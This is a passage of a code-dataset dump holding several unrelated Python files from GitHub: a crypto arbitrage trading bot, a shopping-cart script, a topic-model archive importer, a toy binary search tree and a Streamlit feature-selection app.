db.\n\n Args:\n trader (CCXTTrader): The CCXTTrader to use.\n \"\"\"\n trader.set_forex_ratio()\n self.__persist_forex(trader)\n\n def __persist_trade_data(self, buy_response, sell_response, trade_metadata):\n \"\"\"Persists data regarding the current trade into the database.\n\n If a trade has been executed, we add any necessary information (such as\n foreign key IDs) to the trade responses before saving to the database.\n\n Args:\n buy_response (dict): The autotrageur unified 
response from the\n executed buy trade. If a buy trade was unsuccessful, then\n buy_response is None.\n sell_response (dict): The autotrageur unified response from the\n executed sell trade. If a sell trade was unsuccessful, then\n sell_response is None.\n trade_metadata (TradeMetadata): The trade metadata prepared by the\n autotrageur strategy.\n \"\"\"\n # Persist the spread_opp.\n trade_opportunity_id = trade_metadata.spread_opp.id\n spread_opp = trade_metadata.spread_opp._asdict()\n trade_opp_row_obj = InsertRowObject(\n TRADE_OPPORTUNITY_TABLE,\n spread_opp,\n (TRADE_OPPORTUNITY_PRIM_KEY_ID, ))\n db_handler.insert_row(trade_opp_row_obj)\n\n # Persist the executed buy order, if available.\n if buy_response is not None:\n buy_response['trade_opportunity_id'] = trade_opportunity_id\n buy_response['autotrageur_config_id'] = self._config.id\n buy_response['autotrageur_config_start_timestamp'] = (\n self._config.start_timestamp)\n buy_trade_row_obj = InsertRowObject(\n TRADES_TABLE,\n buy_response,\n (TRADES_PRIM_KEY_TRADE_OPP_ID, TRADES_PRIM_KEY_SIDE))\n db_handler.insert_row(buy_trade_row_obj)\n\n # Persist the executed sell order, if available.\n if sell_response is not None:\n sell_response['trade_opportunity_id'] = trade_opportunity_id\n sell_response['autotrageur_config_id'] = self._config.id\n sell_response['autotrageur_config_start_timestamp'] = (\n self._config.start_timestamp)\n sell_trade_row_obj = InsertRowObject(\n TRADES_TABLE,\n sell_response,\n (TRADES_PRIM_KEY_TRADE_OPP_ID, TRADES_PRIM_KEY_SIDE))\n db_handler.insert_row(sell_trade_row_obj)\n\n db_handler.commit_all()\n\n def __construct_strategy(self):\n \"\"\"Initializes the Algorithm component.\"\"\"\n strategy_builder = FCFStrategyBuilder()\n return (strategy_builder\n .set_has_started(False)\n .set_h_to_e1_max(num_to_decimal(self._config.h_to_e1_max))\n .set_h_to_e2_max(num_to_decimal(self._config.h_to_e2_max))\n .set_max_trade_size(num_to_decimal(self._config.max_trade_size))\n .set_spread_min(num_to_decimal(self._config.spread_min))\n .set_vol_min(num_to_decimal(self._config.vol_min))\n .set_manager(self)\n .build()\n )\n\n def __setup_dry_run_exchanges(self, resume_id):\n \"\"\"Sets up DryRunExchanges which emulate Exchanges. 
Trades, wallet\n balances, other exchange-related state is then recorded.\n\n Args:\n resume_id (str): The unique ID used to resume the bot from a\n previous run.\n\n Returns:\n (tuple(DryRunExchange, DryRunExchange)): The DryRunExchanges for\n E1 and E2 respectively.\n \"\"\"\n if resume_id:\n dry_e1 = self._stat_tracker.dry_run_e1\n dry_e2 = self._stat_tracker.dry_run_e2\n else:\n e1_base, e1_quote = split_symbol(self._config.exchange1_pair)\n e2_base, e2_quote = split_symbol(self._config.exchange2_pair)\n exchange1 = self._config.exchange1\n exchange2 = self._config.exchange2\n e1_base_balance = self._config.dryrun_e1_base\n e1_quote_balance = self._config.dryrun_e1_quote\n e2_base_balance = self._config.dryrun_e2_base\n e2_quote_balance = self._config.dryrun_e2_quote\n dry_e1 = DryRunExchange(exchange1, e1_base, e1_quote,\n e1_base_balance, e1_quote_balance)\n dry_e2 = DryRunExchange(exchange2, e2_base, e2_quote,\n e2_base_balance, e2_quote_balance)\n return dry_e1, dry_e2\n\n\n def __setup_forex(self):\n \"\"\"Sets up any forex services for fiat conversion, if necessary.\"\"\"\n # Bot considers stablecoin (USDT - Tether) prices as roughly equivalent\n # to USD fiat.\n for trader in (self.trader1, self.trader2):\n if ((trader.quote in FIAT_SYMBOLS)\n and (trader.quote != 'USD')\n and (trader.quote != 'USDT')):\n logging.info(\"Set fiat conversion to USD as necessary for: {}\"\n \" with quote: {}\".format(trader.exchange_name,\n trader.quote))\n trader.conversion_needed = True\n self.__update_forex(trader)\n # TODO: Adjust interval once real-time forex implemented.\n schedule.every().hour.do(self.__update_forex, trader)\n\n def __setup_stat_tracker(self, resume_id=None):\n \"\"\"Sets up the bot's StatTracker.\n\n Used for internal tracking and also for persisting simple statistics\n into the database for reporting and analysis.\n\n If resuming a bot, simply logs and returns without any additional\n setup.\n\n Args:\n resume_id (str, optional): The resume id used when resuming a run.\n Defaults to None.\n \"\"\"\n new_stat_tracker_id = str(uuid.uuid4())\n if resume_id:\n if self._config.use_test_api:\n fancy_log(\"Resumed bot running against TEST Exchange APIs.\")\n else:\n fancy_log(\"Resumed bot running against LIVE Exchange APIs.\")\n\n if self._config.dryrun:\n fancy_log(\n \"Resumed - DRY RUN mode. Trades will NOT execute on actual \"\n \"exchanges.\")\n return\n else:\n if self._config.dryrun:\n fancy_log(\n \"DRY RUN mode initiated. 
Trades will NOT execute on actual\"\n \" exchanges.\")\n\n self._stat_tracker = FCFStatTracker(\n new_id=new_stat_tracker_id,\n e1_trader=self.trader1,\n e2_trader=self.trader2)\n\n row_data = {\n 'id': new_stat_tracker_id,\n 'autotrageur_config_id': self._config.id,\n 'autotrageur_config_start_timestamp': self._config.start_timestamp,\n 'autotrageur_stop_timestamp': None,\n 'e1_start_bal_base': self.trader1.base_bal,\n 'e1_close_bal_base': self.trader1.base_bal,\n 'e2_start_bal_base': self.trader2.base_bal,\n 'e2_close_bal_base': self.trader2.base_bal,\n 'e1_start_bal_quote': self.trader1.quote_bal,\n 'e1_close_bal_quote': self.trader1.quote_bal,\n 'e2_start_bal_quote': self.trader2.quote_bal,\n 'e2_close_bal_quote': self.trader2.quote_bal,\n 'num_fatal_errors': 0,\n 'trade_count': 0\n }\n stat_tracker_row_obj = InsertRowObject(\n FCF_MEASURES_TABLE,\n row_data,\n (FCF_MEASURES_PRIM_KEY_ID,))\n db_handler.insert_row(stat_tracker_row_obj)\n db_handler.commit_all()\n\n def __setup_traders(self, exchange_key_map, resume_id):\n \"\"\"Sets up the Traders to interface with exchanges.\n\n Args:\n exchange_key_map (dict): A map containing authentication\n information necessary to connect with the exchange APIs.\n resume_id (str): The unique ID used to resume the bot from a\n previous run.\n\n Raises:\n AutotrageurAuthenticationError: Raised when given incorrect\n credentials or exchange unavailable when attempting to\n communicate through an exchange's API.\n \"\"\"\n # TODO: Looks suitable for a design pattern here to create the Traders\n # as their creation is complex enough.\n\n # Extract the pairs.\n e1_base, e1_quote = split_symbol(self._config.exchange1_pair)\n e2_base, e2_quote = split_symbol(self._config.exchange2_pair)\n\n exchange1 = self._config.exchange1\n exchange2 = self._config.exchange2\n\n # Get exchange configuration settings.\n exchange1_configs = {\n \"nonce\": ccxt.Exchange.milliseconds\n }\n exchange2_configs = {\n \"nonce\": ccxt.Exchange.milliseconds\n }\n\n if exchange_key_map:\n exchange1_configs['apiKey'] = (\n exchange_key_map[exchange1][API_KEY])\n exchange1_configs['secret'] = (\n exchange_key_map[exchange1][API_SECRET])\n exchange1_configs['password'] = (\n exchange_key_map[exchange1][PASSWORD])\n exchange2_configs['apiKey'] = (\n exchange_key_map[exchange2][API_KEY])\n exchange2_configs['secret'] = (\n exchange_key_map[exchange2][API_SECRET])\n exchange2_configs['password'] = (\n exchange_key_map[exchange2][PASSWORD])\n\n # Set up DryRunExchanges.\n if self._config.dryrun:\n dry_e1, dry_e2 = self.__setup_dry_run_exchanges(resume_id)\n else:\n dry_e1 = None\n dry_e2 = None\n\n self.trader1 = CCXTTrader(\n e1_base,\n e1_quote,\n exchange1,\n 'e1',\n num_to_decimal(self._config.slippage),\n exchange1_configs,\n dry_e1)\n self.trader2 = CCXTTrader(\n e2_base,\n e2_quote,\n exchange2,\n 'e2',\n num_to_decimal(self._config.slippage),\n exchange2_configs,\n dry_e2)\n\n # Set to run against test API, if applicable.\n if not self._config.use_test_api:\n fancy_log(\"Starting bot against LIVE exchange APIs.\")\n self.is_test_run = False\n else:\n fancy_log(\"Starting bot against TEST exchange APIs.\")\n self.trader1.connect_test_api()\n self.trader2.connect_test_api()\n self.is_test_run = True\n\n # Load the available markets for the exchange.\n self.trader1.load_markets()\n self.trader2.load_markets()\n\n try:\n # Dry run uses balances set in the configuration files.\n self.trader1.update_wallet_balances()\n self.trader2.update_wallet_balances()\n except 
(ccxt.AuthenticationError, ccxt.ExchangeNotAvailable) as auth_error:\n logging.error(auth_error)\n raise AutotrageurAuthenticationError(auth_error)\n\n def __verify_sold_amount(\n self, bought_amount, sell_trader, buy_response, sell_response):\n \"\"\"Ensure that the sold amount is within tolerance.\n\n Args:\n bought_amount (Decimal): The base amount bought.\n sell_trader (CCXTTrader): The sell side trader.\n buy_response (dict): The buy response.\n sell_response (dict): The sell response.\n\n Raises:\n IncompleteArbitrageError: If the sold amount is not within\n the prescribed tolerance.\n \"\"\"\n rounded_sell_amount = sell_trader.round_exchange_precision(\n bought_amount)\n amount_precision = sell_trader.get_amount_precision()\n difference = rounded_sell_amount - sell_response['pre_fee_base']\n\n if amount_precision is None:\n # Exchange has arbitrary precision.\n tolerance = ZERO\n else:\n tolerance = TEN ** num_to_decimal(-amount_precision)\n\n if abs(difference) > tolerance:\n msg = (\"The purchased base amount does not match with \"\n \"the sold amount. Normal execution has \"\n \"terminated.\\nBought amount: {}\\n, Expected \"\n \"sell amount: {}\\nSold amount:\"\n \" {}\\n\\nBuy results:\\n\\n{}\\n\\nSell results:\\n\\n\"\n \"{}\\n\").format(\n bought_amount,\n rounded_sell_amount,\n sell_response['pre_fee_base'],\n pprint.pformat(buy_response),\n pprint.pformat(sell_response))\n\n raise IncompleteArbitrageError(msg)\n\n # @Override\n def _alert(self, subject):\n \"\"\"Last ditch effort to alert user on operation failure.\n\n Args:\n subject (str): The subject/topic for the alert.\n \"\"\"\n alert_error = False\n try:\n self._send_email(subject, traceback.format_exc())\n except Exception as exc:\n alert_error = True\n logging.debug(\"An error occurred trying to send an email.\")\n logging.error(exc, exc_info=True)\n finally:\n try:\n self.twilio_client.phone(\n [subject, DEFAULT_PHONE_MESSAGE],\n self.twilio_config[TWILIO_RECIPIENT_NUMBERS],\n self.twilio_config[TWILIO_SENDER_NUMBER],\n is_mock_call=self._config.dryrun or self.is_test_run)\n except Exception as exc:\n alert_error = True\n logging.debug(\"An error occurred trying to phone with twilio.\")\n logging.error(exc, exc_info=True)\n\n if alert_error:\n raise FCFAlertError(\"One or more methods of communication have\"\n \" failed. 
Check the logs for more detail.\")\n\n # @Override\n def _clean_up(self):\n \"\"\"Cleans up the state of the autotrageur before performing next\n actions which may be harmed by previous state.\"\"\"\n self._strategy.clean_up()\n\n # @Override\n def _execute_trade(self):\n \"\"\"Execute the arbitrage.\"\"\"\n buy_response = None\n sell_response = None\n trade_metadata = self._strategy.get_trade_data()\n\n if self._config.dryrun:\n logging.debug(\"**Dry run - begin fake execution\")\n buy_response = arbseeker.execute_buy(\n trade_metadata.buy_trader,\n trade_metadata.buy_price)\n self._stat_tracker.trade_count += 1\n\n executed_amount = buy_response['post_fee_base']\n sell_response = arbseeker.execute_sell(\n trade_metadata.sell_trader,\n trade_metadata.sell_price,\n executed_amount)\n self._stat_tracker.trade_count += 1\n\n self._strategy.finalize_trade(buy_response, sell_response)\n self._stat_tracker.log_balances()\n self.__persist_trade_data(\n buy_response, sell_response, trade_metadata)\n logging.debug(\"**Dry run - end fake execution\")\n else:\n try:\n buy_response = arbseeker.execute_buy(\n trade_metadata.buy_trader,\n trade_metadata.buy_price)\n bought_amount = buy_response['post_fee_base']\n except Exception as exc:\n self._send_email(\"BUY ERROR ALERT - CONTINUING\", repr(exc))\n logging.error(exc, exc_info=True)\n self._strategy.strategy_state = self.checkpoint.strategy_state\n else:\n self._stat_tracker.trade_count += 1\n\n # If an exception is thrown, we want the program to stop on the\n # second trade.\n try:\n sell_response = arbseeker.execute_sell(\n trade_metadata.sell_trader,\n trade_metadata.sell_price,\n bought_amount)\n self.__verify_sold_amount(\n bought_amount,\n trade_metadata.sell_trader,\n buy_response,\n sell_response)\n except Exception as exc:\n self._send_email(\"SELL ERROR ALERT - ABORT\", repr(exc))\n logging.error(exc, exc_info=True)\n raise\n else:\n self._stat_tracker.trade_count += 1\n self._strategy.finalize_trade(buy_response, sell_response)\n self._send_email(\n \"TRADE SUMMARY\",\n \"Buy results:\\n\\n{}\\n\\nSell results:\\n\\n{}\\n\".format(\n pprint.pformat(buy_response),\n pprint.pformat(sell_response)))\n finally:\n self.__persist_trade_data(\n buy_response, sell_response, trade_metadata)\n\n # @Override\n def _export_state(self):\n \"\"\"Exports the state of the autotrageur to a database.\n\n NOTE: This method is only called when the fcf bot is stops due to a\n fatal error or if it is killed manually.\"\"\"\n logging.debug(\"#### Exporting bot's current state\")\n\n # UPDATE the fcf_measures table with updated stats.\n raw_update_result = db_handler.execute_parametrized_query(\n \"UPDATE fcf_measures SET \"\n \"autotrageur_stop_timestamp = %s, \"\n \"e1_close_bal_base = %s, \"\n \"e2_close_bal_base = %s, \"\n \"e1_close_bal_quote = %s, \"\n \"e2_close_bal_quote = %s, \"\n \"num_fatal_errors = num_fatal_errors + 1, \"\n \"trade_count = %s \"\n \"WHERE id = %s;\",\n (int(time.time()),\n self._stat_tracker.e1.base_bal,\n self._stat_tracker.e2.base_bal,\n self._stat_tracker.e1.quote_bal,\n self._stat_tracker.e2.quote_bal,\n self._stat_tracker.trade_count,\n self._stat_tracker.id))\n\n logging.debug(\"UPDATE fcf_measures affected rows: {}\".format(\n raw_update_result))\n\n # Register copyreg.pickle with Checkpoint object and helper function\n # for better backwards-compatibility in pickling.\n # (See 'fcf_checkpoint_utils' module for more details)\n copyreg.pickle(FCFCheckpoint, pickle_fcf_checkpoint)\n\n # Detach the Traders from StatTracker and 
attach it to the Checkpoint.\n self._stat_tracker.detach_traders()\n self.checkpoint.stat_tracker = self._stat_tracker\n\n # The generated ID can be used as the `resume_id` to resume the bot\n # from the saved state.\n fcf_state_map = {\n 'id': str(uuid.uuid4()),\n 'autotrageur_config_id': self._config.id,\n 'autotrageur_config_start_timestamp': self._config.start_timestamp,\n 'state': pickle.dumps(self.checkpoint)\n }\n logging.debug(\n \"#### The exported checkpoint object is: {0!r}\".format(\n self.checkpoint))\n logging.info(\"Exported with resume id: {}\".format(\n fcf_state_map[FCF_STATE_PRIM_KEY_ID]))\n fcf_state_row_obj = InsertRowObject(\n FCF_STATE_TABLE,\n fcf_state_map,\n (FCF_STATE_PRIM_KEY_ID,))\n db_handler.insert_row(fcf_state_row_obj)\n db_handler.commit_all()\n\n # Reattach the Traders for further use in current bot run.\n self._stat_tracker.attach_traders(self.trader1, self.trader2)\n\n # @Override\n def _final_log(self):\n \"\"\"Produces a final log and console output during the finality of the\n bot.\"\"\"\n self._stat_tracker.log_all()\n\n # @Override\n def _import_state(self, resume_id):\n \"\"\"Imports the state of a previous autotrageur run.\n\n Sets the FCFCheckpoint to be a snapshot of the previous autotrageur's\n state.\n\n Args:\n resume_id (str): The unique ID used to resume the bot from a\n previous run.\n \"\"\"\n logging.debug(\"#### Importing bot's previous state\")\n raw_result = db_handler.execute_parametrized_query(\n \"SELECT state FROM fcf_state where id = %s;\",\n (resume_id,))\n\n # The raw result comes back as a list of tuples. We expect only\n # one result as the `autotrageur_resume_id` is unique per\n # export.\n previous_checkpoint = pickle.loads(raw_result[0][0])\n\n if not isinstance(previous_checkpoint, FCFCheckpoint):\n raise IncorrectStateObjectTypeError(\n \"FCFCheckpoint is the required type. {} type was given.\"\n .format(type(previous_checkpoint)))\n\n self.checkpoint = previous_checkpoint\n\n # @Override\n def _poll_opportunity(self):\n \"\"\"Poll exchanges for arbitrage opportunity.\n\n Returns:\n bool: Whether there is an opportunity.\n \"\"\"\n return self._strategy.poll_opportunity()\n\n # @Override\n def _post_setup(self, arguments):\n \"\"\"Initializes any additional components which rely on the core\n components.\n\n Components initialized:\n - Traders to interface with exchange APIs (parses the keyfile for\n relevant authentication first)\n - BalanceChecker\n - Twilio Client\n - Forex Client\n\n Other responsibilities:\n - Persists Configuration and Forex in the database.\n\n NOTE: The order of these calls matters. 
For example, the StatTracker\n relies on instantiated Traders, and a persisted Configuration entry.\n\n Args:\n arguments (dict): Map of the arguments passed to the program.\n \"\"\"\n super()._post_setup(arguments)\n\n # Persist the configuration.\n self.__persist_config()\n\n # Parse keyfile into a dict.\n exchange_key_map = self.__parse_keyfile(\n arguments['KEYFILE'], arguments['--pi_mode'])\n\n # Set up the Traders for interfacing with exchange APIs.\n self.__setup_traders(exchange_key_map, arguments['--resume_id'])\n\n # Initialize StatTracker component and attach it to the Checkpoint.\n self.__setup_stat_tracker(arguments['--resume_id'])\n if arguments['--resume_id']:\n self._stat_tracker.attach_traders(self.trader1, self.trader2)\n\n # Initialize a Balance Checker.\n self.balance_checker = FCFBalanceChecker(\n self.trader1, self.trader2, self._send_email)\n\n # Set up Twilio Client.\n self.__load_twilio(self._config.twilio_cfg_path)\n\n # Set up Forex client.\n self.__setup_forex()\n\n\n def _send_email(self, subject, msg):\n \"\"\"Send email alert to preconfigured emails.\n\n Args:\n subject (str): The subject of the message.\n msg (str): The contents of the email to send out.\n \"\"\"\n send_all_emails(self._config.email_cfg_path, subject, msg)\n\n # @Override\n def _setup(self, arguments):\n \"\"\"Initializes the autotrageur bot for use by setting up core\n components which must be set up before any additional components.\n\n In addition to superclass setup, the following core components are\n initialized:\n - Checkpoint (for state-related variables)\n - Algorithm\n - Dry Run (on resume)\n\n If starting from resume:\n - Import the previous Checkpoint, setting a checkpoint object.\n - Restore any state from the Checkpoint\n Else:\n - Initialize the Checkpoint object with the Configuration\n - Initialize the Algorithm\n\n Args:\n arguments (dict): Map of the arguments passed to the program.\n \"\"\"\n super()._setup(arguments)\n\n resume_id = arguments['--resume_id']\n if resume_id:\n self._import_state(resume_id)\n self._config = self.checkpoint.config\n self._strategy = self.__construct_strategy()\n self.checkpoint.restore_strategy(self._strategy)\n self._stat_tracker = self.checkpoint.stat_tracker\n logging.debug(\n '#### Restored State objects: {0!r}\\n{1!r}\\n{2!r}'.format(\n self._config,\n self._strategy.state,\n self._stat_tracker))\n else:\n # Initialize a Checkpoint object to hold state.\n self.checkpoint = FCFCheckpoint(self._config)\n\n # Set up the Algorithm.\n self._strategy = self.__construct_strategy()\n\n # @Override\n def _wait(self):\n \"\"\"Wait for the specified polling interval.\n\n We use the Autotrageur default unless a chunked trade is in\n progress.\n \"\"\"\n if self._strategy.trade_chunker.trade_completed:\n super()._wait()\n else:\n time.sleep(self._config.poll_wait_short)\n","repo_name":"ronaldlam/Autotrageur","sub_path":"autotrageur/bot/arbitrage/fcf_autotrageur.py","file_name":"fcf_autotrageur.py","file_ext":"py","file_size_in_byte":32460,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"38124949651","text":"import os\n\n'''\nSimple shop cart algorithm\n'''\n\nshop_card = []\nwhile True:\n print('Escolha uma opção: ')\n option = int(\n input(f'''\n {1} Inserir\n {2} Apagar\n {3} Listar\n {4} Sair\n ''')\n)\n\n if option == 1:\n os.system('clear')\n\n item = input('Insira o item: ')\n shop_card.append(item)\n\n os.system('clear')\n\n elif option == 2:\n\n try:\n index = int(input('Escolha o 
inice: \\n'))\n del shop_card[index]\n print(f'O item excluido foi {item}\\n')\n except ValueError:\n print('Somente numeros inteiros')\n except IndexError:\n print('Indice não existe\\n')\n except Exception:\n print('Erro desconhecido')\n\n elif option == 3:\n\n os.system('clear')\n\n for i, value in enumerate(shop_card):\n print(i, value,'\\n')\n\n elif option == 4:\n exit()\n","repo_name":"jorgebarcelos/drafts","sub_path":"app/listas_compras.py","file_name":"listas_compras.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23748376532","text":"from __future__ import print_function\nfrom future import standard_library\nstandard_library.install_aliases()\nfrom builtins import input\nfrom builtins import range\n\nfrom codecs import open\nimport os\nimport os.path\nfrom zipfile import ZipFile\n\nimport topicexplorer.config\n\ndef absolutize_config_file(config_file, output_dir):\n config_file = os.path.join(output_dir, config_file)\n\n config = topicexplorer.config.read(config_file)\n\n # path variables\n corpus_file = config.get('main', 'corpus_file')\n corpus_file = os.path.join(output_dir, corpus_file)\n corpus_file = os.path.abspath(corpus_file)\n config.set('main', 'corpus_file', corpus_file)\n\n model_pattern = config.get('main', 'model_pattern')\n model_pattern = os.path.join(output_dir, model_pattern)\n model_pattern = os.path.abspath(model_pattern)\n config.set('main', 'model_pattern', model_pattern)\n \n cluster_path = config.get('main', 'cluster')\n if cluster_path is not None and cluster_path != 'None':\n cluster_path = os.path.join(output_dir, cluster_path)\n cluster_path = os.path.abspath(cluster_path)\n config.set('main', 'cluster', cluster_path)\n \n path = config.get('main', 'path')\n if path is not None and path != 'None':\n path = os.path.join(output_dir, path)\n path = os.path.abspath(path)\n config.set('main', 'path', path)\n \n raw_corpus = config.get('main', 'raw_corpus')\n if raw_corpus is not None and raw_corpus != 'None':\n raw_corpus = os.path.join(output_dir, raw_corpus)\n raw_corpus = os.path.abspath(raw_corpus)\n config.set('main', 'raw_corpus', raw_corpus)\n \n corpus_desc = config.get('main', 'corpus_desc')\n if corpus_desc is not None and corpus_desc != 'None':\n corpus_desc = os.path.join(output_dir, corpus_desc)\n corpus_desc = os.path.abspath(corpus_desc)\n config.set('main', 'corpus_desc', corpus_desc)\n \n htrc_metadata = config.get('www', 'htrc_metadata')\n if htrc_metadata is not None and htrc_metadata != 'None':\n htrc_metadata = os.path.join(output_dir, htrc_metadata)\n htrc_metadata = os.path.abspath(htrc_metadata)\n config.set('www', 'htrc_metadata', htrc_metadata)\n\n with open(config_file, 'w', encoding='utf8') as configfile:\n config.write(configfile)\n\n\ndef populate_parser(parser):\n parser.add_argument('tezfile', help='TEZ archive file')\n parser.add_argument('-o', '--output', default='.', required=False,\n help=\"output directory\")\n return parser\n\n\ndef main(args):\n if not os.path.exists(args.output):\n os.makedirs(args.output)\n elif not os.path.isdir(args.output):\n raise IOError(\"Invalid path: must be a directory.\")\n \n with ZipFile(args.tezfile) as tezfile:\n print(\"Extracting files...\")\n tezfile.extractall(args.output)\n \n with ZipFile(args.tezfile) as tezfile:\n files = tezfile.namelist()\n config_candidates = [f for f in files if f.endswith('.ini')]\n if len(config_candidates) > 1:\n raise IOError(\"Multiple config 
files in tez archive\")\n elif not config_candidates:\n raise IOError(\"No config file in tez archive\")\n else:\n absolutize_config_file(config_candidates[0], args.output)\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n parser = ArgumentParser()\n populate_parser(parser)\n args = parser.parse_args()\n\n main(args)\n","repo_name":"inpho/topic-explorer","sub_path":"topicexplorer/tezimport.py","file_name":"tezimport.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"78"} +{"seq_id":"6411746234","text":"class Node:\n\n def __init__(self, data):\n self.left = None\n self.right = None\n self.depth = 0\n self.data = data\n\n# Insert method to create nodes\n def insert(self, data, d=1):\n if self.data:\n if data < self.data:\n if self.left is None:\n self.left = Node(data)\n self.left.depth = d\n else:\n d += 1\n self.left.insert(data, d)\n elif data > self.data:\n if self.right is None:\n self.right = Node(data)\n self.right.depth = d\n else:\n d += 1\n self.right.insert(data, d)\n\n else:\n self.data = data\n\n def remove(self, data):\n if data < self.data:\n if self.left is None:\n print(f'{data} is not found')\n else:\n self.left.remove(data)\n elif data > self.data:\n if self.right is None:\n print(f'{data} is not found')\n else:\n self.right.remove(data)\n else:\n if self.left is None and self.right is None:\n print(f'{self.data} was found for deleting')\n del self.data\n\n\n\n\n # findval method to compare the value with nodes\n def findval(self, lkpval):\n if lkpval < self.data:\n if self.left is None:\n return str(lkpval)+\" is not Found\"\n return self.left.findval(lkpval)\n elif lkpval > self.data:\n if self.right is None:\n return str(lkpval)+\" is not Found\"\n return self.right.findval(lkpval)\n else:\n return str(self.data) + \" is found\"\n\n# Print the tree\n def PrintTree(self):\n if self.right:\n self.right.PrintTree()\n\n for d in range(self.depth):\n print('-', end='')\n\n print(f\"{self.data} ({self.depth})\")\n\n if self.left:\n self.left.PrintTree()\n\n\n\nroot = Node(27)\nroot.insert(14)\nroot.insert(35)\nroot.insert(31)\nroot.insert(10)\nroot.insert(19)\n\nroot.PrintTree()\n\nprint('--------------------')\nroot.remove(10)\nprint('--------------------')\n\nroot.PrintTree()\n\n#\n# print('--------------------')\n# root.remove(19)\n# root.PrintTree()\n#\n# print('--------------------')\n# root.remove(35)\n# root.PrintTree()\n","repo_name":"lipskydan/Binary-Tree","sub_path":"App/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41950326151","text":"import streamlit as st\nimport pandas as pd\nfrom func import FeatureSelector\nfrom charts import *\nfrom models import ModelRunner\nimport warnings\nfrom sklearn.exceptions import DataConversionWarning\n\nimport altair as alt\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay, RocCurveDisplay, PrecisionRecallDisplay\nfrom sklearn.metrics import precision_score, recall_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.linear_model import 
LinearRegression\nimport seaborn as sns\nfrom sklearn.metrics import classification_report\n\nwarnings.filterwarnings(action='ignore', category=DataConversionWarning)\n\ndf = None # global dataframe; if it is not uploaded, it is None.\nst.title('Feature Selection')\nst.sidebar.title('This is the sidebar')\nst.sidebar.markdown('Choose an option!!')\n\ndef main():\n global df\n #Title\n#def main():\n \nif __name__ == \"__main__\":\n main()\n\n@st.cache_data(persist= True)\ndef load():\n data= pd.read_csv(\"data/Updated_Subset_1.csv\")\n# label= LabelEncoder()\n# for i in data.columns:\n# data[i] = label.fit_transform(data[i])\n return data\ndf = load()\n\ndf = df.drop(columns=[\"sub_id\"])\n\n\n@st.cache_data(persist=True)\ndef split(df):\n y = df.label\n x = df.drop(columns=[\"label\"])\n x_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.3, random_state=0)\n return x_train, x_test, y_train, y_test\nx_train, x_test, y_train, y_test = split(df)\n\ndef plot_metrics(metrics_list):\n if \"Confusion Matrix\" in metrics_list:\n st.subheader(\"Confusion Matrix\")\n ConfusionMatrixDisplay.from_estimator(model, x_test, y_test, display_labels=class_names)\n st.pyplot()\n #cm=confusion_matrix(y_test, y_pred)\n #ConfusionMatrixDisplay(cm,model.classes_).plot()\n if \"ROC Curve\" in metrics_list:\n st.subheader(\"ROC Curve\")\n RocCurveDisplay.from_estimator(model, x_test, y_test)\n st.pyplot()\n if \"Precision-Recall Curve\" in metrics_list:\n st.subheader(\"Precision-Recall Curve\")\n PrecisionRecallDisplay.from_estimator(model, x_test, y_test)\n st.pyplot()\nclass_names = [\"walk\", \"run\"]\n\ntab1, tab2, tab3 = st.tabs(['Feature Selection', 'Dimension Reduction', 'Regression'])\nwith tab1:\n if st.sidebar.checkbox(\"Display data\", False):\n st.subheader(\"Show mHealth dataset\")\n st.write(df)\n if df is not None:\n #display dataframe\n #st.write(df)\n #select target variable\n target = st.selectbox(\"Select Target Feature\",df.columns)\n #select feature selection method\n selector = st.radio(label=\"Selection Method\",options=[\"SelectKBest\",\"RFE\",\"SelectFromModel\"])\n F = FeatureSelector(df,target)\n univariate,ref,sfm,problem = F.get_result_dictionaries()\n #chart\n if selector == \"SelectKBest\":\n fig = barchart(univariate[\"scores\"], univariate[\"feature_names\"], \"Feature Scores acc to SelectKBest\")\n elif selector == \"RFE\":\n fig = barchart(ref[\"ranking\"], ref[\"feature_names\"], \"Ranking acc to RFE; (Lower better)\")\n elif selector == \"SelectFromModel\":\n fig = barchart(sfm[\"scores\"], sfm[\"feature_names\"], \"Feature Scores acc to SelectFromModel\")\n st.pyplot(fig)\n #select k number of features to proceed\n k = st.number_input(\"Number of Feature to proceed (k): \", min_value=0, max_value= len(df.columns) - 1)\n if problem == \"regression\":\n model = st.selectbox(\"ML Method\",[\"Linear Regression\",\"XGBoost\"])\n else:\n model = st.selectbox(\"ML Method\",[\"Logistic Regression\",\"Decision Tree\"])\n #when k is determined \n if k > 0:\n #get last X,y according to feature selection\n X,_,temp,col_types,_ = F.extract_x_y() \n y = df[target].values.reshape(-1,1)\n #feature set\n if selector == \"SelectKBest\":\n X = F.univariate_feature_selection(X,y,temp,k)[\"X\"]\n elif selector == \"RFE\":\n X = F.ref_feature_selection(X,y,temp,col_types,k)[\"X\"]\n elif selector == \"SelectFromModel\":\n X = F.sfm_feature_selection(X,y,temp,col_types,k)[\"X\"]\n #run models\n M = ModelRunner(model,X,y,problem)\n score = M.runner()\n #display score\n 
